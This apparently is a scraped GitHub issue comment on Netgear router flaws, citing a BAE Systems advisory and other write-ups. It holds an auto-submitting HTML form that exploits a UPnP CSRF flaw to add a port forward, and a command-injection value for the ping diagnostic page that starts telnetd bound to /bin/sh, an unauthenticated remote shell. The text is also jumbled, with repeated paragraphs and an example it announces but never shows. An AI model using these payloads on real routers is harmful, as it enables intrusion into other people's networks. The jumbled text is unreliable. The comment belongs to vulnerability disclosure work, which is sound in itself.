You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Secondly the BAE report for DGN2200 also has a command injection / CSRF for the ping diagnostic page, which worked great on my DG834Gv5. (I just used the Firefox debugger's Net tab, with ""Edit and Resend""). I quote:
Example exploitation to obtain a file and directory listing:
4/26/2014 23:43:52 "How about uPnP CSRF?
Netgear N300 DGN2200
according to http://www.baesystemsdetica.com.au/Research/Advisories/NETGEAR-DGN2200-Multiple-Vulnerabilities-(AIS-2014
http://osvdb.org/103230
Netgear WNDR3400v3
according to http://disconnected.io/2014/03/18/how-i-hacked-your-router/
Netgear DG384v5
(tested myself)
PoC taken from the BAE report
<textarea id=""1"" name=""1"" width=""80"" height=""25""> hax3 0 192.168.0.1 1 8888 TCP 80 </textarea><input type=""submit"" >
<script>document.forms[0].submit();</script>Secondly the BAE report for DGN2200 also has a command injection / CSRF for the ping diagnostic page, which worked great on my DG834Gv5. (I just used the Firefox debugger's Net tab, with ""Edit and Resend""). I quote:
Example exploitation to obtain a file and directory listing:
To get an interactive shell,
IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
The text was updated successfully, but these errors were encountered: